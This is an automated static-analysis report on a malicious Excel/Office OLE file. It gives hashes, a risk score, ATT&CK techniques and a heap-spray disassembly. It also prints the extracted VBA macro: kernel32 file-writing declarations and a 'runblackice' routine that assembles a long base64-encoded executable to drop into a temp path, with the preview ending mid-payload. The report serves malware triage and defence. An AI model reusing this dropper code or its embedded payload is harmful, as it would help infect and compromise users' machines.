Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 988d1b9ced992aa8…

MALICIOUS

Office (OLE)

295.5 KB Created: 2013-12-12 06:42:32 First seen: 2014-11-01
MD5: 1f354e01d32b49c4e0689fb8afddf713 SHA-1: 38d63615b9b3a29a4e0a0a268a0d7e4127857395 SHA-256: 988d1b9ced992aa8a40d808d3985a18562f671923df5ab753c7025b7f2f1e5ad
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros. The macros appear to be obfuscated and attempt to write a file to disk, likely to download and execute a second-stage payload. The document body contains a list of names and addresses, which could be used as a lure for a phishing campaign.

Heuristics 3

  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    00044DDA  41                inc ecx
00044DDB  41                inc ecx
00044DDC  41                inc ecx
00044DDD  41                inc ecx
00044DDE  41                inc ecx
00044DDF  41                inc ecx
00044DE0  41                inc ecx
00044DE1  41                inc ecx
00044DE2  41                inc ecx
00044DE3  41                inc ecx
00044DE4  41                inc ecx
00044DE5  41                inc ecx
00044DE6  41                inc ecx
00044DE7  41                inc ecx
00044DE8  41                inc ecx
00044DE9  41                inc ecx
00044DEA  41                inc ecx
00044DEB  41                inc ecx
00044DEC  41                inc ecx
00044DED  41                inc ecx
00044DEE  41                inc ecx
00044DEF  41                inc ecx
00044DF0  41                inc ecx
00044DF1  41                inc ecx
00044DF2  41                inc ecx
00044DF3  41                inc ecx
00044DF4  41                inc ecx
00044DF5  41                inc ecx
00044DF6  41                inc ecx
00044DF7  41                inc ecx
00044DF8  41                inc ecx
00044DF9  41                inc ecx
00044DFA  41                inc ecx
00044DFB  41                inc ecx
00044DFC  41                inc ecx
00044DFD  41                inc ecx
00044DFE  41                inc ecx
00044DFF  41                inc ecx
00044E00  41                inc ecx
00044E01  41                inc ecx
00044E02  41                inc ecx
00044E03  41                inc ecx
00044E04  41                inc ecx
00044E05  41                inc ecx
00044E06  41                inc ecx
00044E07  41                inc ecx
00044E08  41                inc ecx
00044E09  41                inc ecx
00044E0A  41                inc ecx
00044E0B  41                inc ecx
00044E0C  41                inc ecx
00044E0D  41                inc ecx
00044E0E  41                inc ecx
00044E0F  41                inc ecx
00044E10  41                inc ecx
00044E11  41                inc ecx
00044E12  41                inc ecx
00044E13  41                inc ecx
00044E14  41                inc ecx
00044E15  41                inc ecx
00044E16  41                inc ecx
00044E17  41                inc ecx
00044E18  41                inc ecx
00044E19  41                inc ecx
00044E1A  41                inc ecx
00044E1B  41                inc ecx
00044E1C  41                inc ecx
00044E1D  41                inc ecx
00044E1E  41                inc ecx
00044E1F  41                inc ecx
00044E20  41                inc ecx
00044E21  41                inc ecx
00044E22  41                inc ecx
00044E23  41                inc ecx
00044E24  41                inc ecx
00044E25  41                inc ecx
00044E26  41                inc ecx
00044E27  41                inc ecx
00044E28  41                inc ecx
00044E29  41                inc ecx
00044E2A  41                inc ecx
00044E2B  41                inc ecx
00044E2C  41                inc ecx
00044E2D  41                inc ecx
00044E2E  41                inc ecx
00044E2F  41                inc ecx
00044E30  41                inc ecx
00044E31  41                inc ecx
00044E32  41                inc ecx
00044E33  41                inc ecx
00044E34  41                inc ecx
00044E35  41                inc ecx
00044E36  41                inc ecx
00044E37  41                inc ecx
00044E38  41                inc ecx
00044E39  41                inc ecx
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9806 bytes
SHA-256: b736076d4e4aa4a14cbe3f79ba1cfefdfc6d840d323c4c62e00c930a47b82a24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 15 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!!blackice>
Private Const base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function GetTempFileName Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpPathName As String, ByVal lpPrefixString As String, ByVal uUnique As Long, ByVal lpTempFileName As String) As Long
Private Sub runblackice()
On Error Resume Next
filestring = "TVoAAAAAAAAAAAAAUEUAAEwBAgBGU0chAAAAAAAAAADgAA8BCwEAAADgAAAAsAAAAAAAAFQBAAAAEAAADAAAAAAAQAAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAUAIAAAIAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAADAQQIAhAAAAACwAQBcDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAADAAAAAAAAAAAAAoAAAALABAEGSAAAAAgAAAAAAAAAAAAAAAAAA4AAAwIclBEJCAGGUVaS2gP8Tc/kzyf8TcxYzwP8Tcx+2gEGwEP8TEsBz+nU6quvg"
filestring = filestring + "/1MIAvaD2QF1Dv9TBOskrNHodC0TyesYkUjB4Ais/1MEO0P4cwqA/AVzBoP4f3cCQUGVi8W2AFaL9yvw86Re659erZetUP9TEJWLB0B483UD/2MMUFX/UxSr6+4zyUH/ExPJ/xNy+MMC0nUFihZGEtLDS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAUAAAgAAAAAAAAAAAAAAAAAAAAQBlAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAECAAAgAAAAAAAAAAAAAAAAAAAAAAAAQAECAAAkAAAAKCwAQCoDAAAAAAAAAAAAABIvQEAFAAAAAAAAAAAAAAAKAAAACAAAABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAz"
filestring = filestring + "MwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAAAACZmWbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzAAzMwCZmfj4+JnM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+JnM/5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/5n//5nM/5n/"
filestring = filestring + "/5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5n//5n//5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5nM/5n/"
filestring = filestring + "/5nM/5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5nM/5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/"
filestring = filestring + "/5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n/"
filestring = filestring + "/5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/"
filestring = filestring + "/5n//5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//2bMzAgICACZmfj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+AAAAAAAAACZmWbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzACZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQAAAAAAAAAAAACZmfD7/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAA"
filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////////////////////+AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAA4AAf//AAP//4AH///AD////////AAABAAEAICAAAAEAGACoDAAAAQBVHIvsg4EwjUUcic3c5H0Q4HV/CAfI/+kzAQ4Dx0XkQAoH6IxG7CPwBvz9/wIHjU34UWgGBCA9agGPVRRSY1DyQICLRRDmCOv7r+H/URSQqOBz4c9jIBLp32BxEBiDwAF9wQYEUOgwex74xPOHRtSLTT7c2fSm2EFa6wm8eIaDwgGJDN5aWDtgfTLQQJobwRBGtjTPEuo7L2GDKvQDyOwCiX8BZkKIQR7sCNgMzlIM+FHm60W9m7DsRyBq5IDS4gQKhdJ0DbyRASCNxTroahC0jgpNDFG4BuRSZmAoCFDI6QRkwlHWwW26EtfI/1AYpcYRBRnrHIzcwi1Cubq30CQ6yghbem09/OVdScNROYEUoAFoMIiqwBBB4P82FSitjEG4zgpg"
filestring = filestring + "YzAFEkFNmAw9YDVqUQSLAYeIUpBQNPMKuv5IYukGzFVm6KhJA3QosHmirgSaxASoiZNlrKpQSQmw7UiQGbQkDIcNaOTjA4qY5UPgBOgfQIeaJKpTAd4PhbZI/01Q6NUVNFDx8RzvGBFdVZhQUqzozmQChe/9CjAUg1AF6UmG3GTC8IJHvISh6FA3yCBDRbz1GUxvuB4yEaS8RD3rEAjpQcqHajU8SBSFlWBPk1LdMnzwkqOnHJCYDGgso43jQBxR6MpIeU+KCEVw6xOSxoGlhUUhCnCZIUjJ2TgeISZQuQOORoSbBd00VmONGGYvavxU5tEo4VERRCBQyg4UGKRMivxSujvA/66thTYqpCrACINl5LtUSS7IOarACeIZyAzMjCFMERKEY0UDoXP8IqyQRUJ8yByjxr0iAkFFzZxb/SFYkJyhKfwfeEcCIfjJJE4BK4pspGT4KM9M+1DkSFpcRFUc1KB8QpHIiEFNoFFEb0SRmPt8IKXIENDkPJHU0DiR"
filestring = filestring + "VfwCkUoPcCBC+QfFDG4cYs5ooEYHQtCKInaQNOGlATeKcITiZED/UYoEv1LPiiGsFIUcSGkQoHbfjMB1emOKOqNMOLE9JDXxVQHiUgrKpKYf/HdaemuRDNJyMtQsQlCZMkTcI8xATOERyy6sk9bdCOFRPkHxDEwc1IRD2CHckeBE/byEKU3QkwIB6Cf6lPvJTKSVTCoBSNTXxZxQRC36+SMUc3vdt3JMUklToEcMWMT4J1jEnCdYxIQnWEoZu2gDv/SSTULgWPVGoyqEdlkktEzmnWEAM8DrG+l13ZFUcAUidznrgTqLO5U8nz2dJZsUXSLkAiyFSLZHaPQRomCGhXAlKIO9BrtmCMkGuLV4I85pKJU5u2yhNOuwcpMGhLEWrnU8NWg5y3hM99NFLZVkEwhKMI0gJjNClWyoEulCEBIihXjuV1gEACz4N8huS4eKdZmF+OyOwCgsMEKVSbwh7Atm+DIyNqCQhXP2lEx7iRz9N8Ij9EJEEhAc/YQhfnSu"
filestring = filestring + "QB1NbI4UlRUIUuhZzdczsp6RElYrTLUh7Arj94N2RXFD0vQpLoTMRSkPiZiRQ19ipsTwRFpDgEEG4A+VJsCItAbrBMYKVgH5lyR/JDbeSnOA4FCFQ4VYXJmaJFErPUs0RXTm2lMahYg3aVaNQiNRzlkohZA6CVXYgeISynALSWbNyIjkjCiQhRCUsmQZhAkJvHAGyUn2z6UsGlVPBDEWlUS/Iy6RKWJocL4+/QwUhUQVaQ6f8ngZRA8hKvCyA4q6Os8RJAnZiAxEh4ja9XYjYAORfE0niAGp4MuarmZIuLFYjTHIShCFyEIQjchKRJwhlXxiAdDFEGX17OZFAjzXGo0gIymgxZOSuDIIIBaUACG48J4Ck2mRdFxLJiUUYMAPhNGtvqHSyMh1IfDWEAJo0Mt0HvEldfQasj6tS+xssyRY/vHo3IYhJP4J7W9ls5CqkMe0o7bohUhcHdKCuY2JCkW85NxRJ0oov+SMnuNJQQOFIwIgQUOVIFFDhUooy9yE"
filestring = filestring + "Q+Ah5JHoieyZg3RpYJIEDFnzjxxknFzLw9Qy4rDMeCUEEx6DCQHoFfOeDYRd7VejisBpQs1CURsSxCx8jvELI0S8QsiE7xHZ9RAIjYRDURGb8qGVeAgCpiGU9WEl6WsIZoRFYf1uQgV7KUH9idGZ2Zfhp+mlLf+UPAJEVle5EKPmvhwB1Y19vPOlpCmIGXwPDUD9CXzMAIpEBbzrArAVPV9eNck0UdwZDzoMMCRJhr56EhALxvTkzJAV+83weGN2mA3JJvhThzASg8AD30rzPBDL6cs5t/EPje58+ZlUAnkMOU2WgeEhPMHp/YPkP1En6F+sAq4PM77QjuAVfOQlHXpzBjboAllMVggvHwQLRYPgPwqILjFZ3BZSUwg0IQREECgGjiH6/sTsMhA5AhRII9dRyEfV2AXcweKkJgtnwqLss+EQZJAm6AoYEBL8sT4wS4P0BN2YoP1H75vE/HnwJMEDEJTpbGNA+DuaEIL6HQEqMRwr/+RG2IIk0BMkDtQr"

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.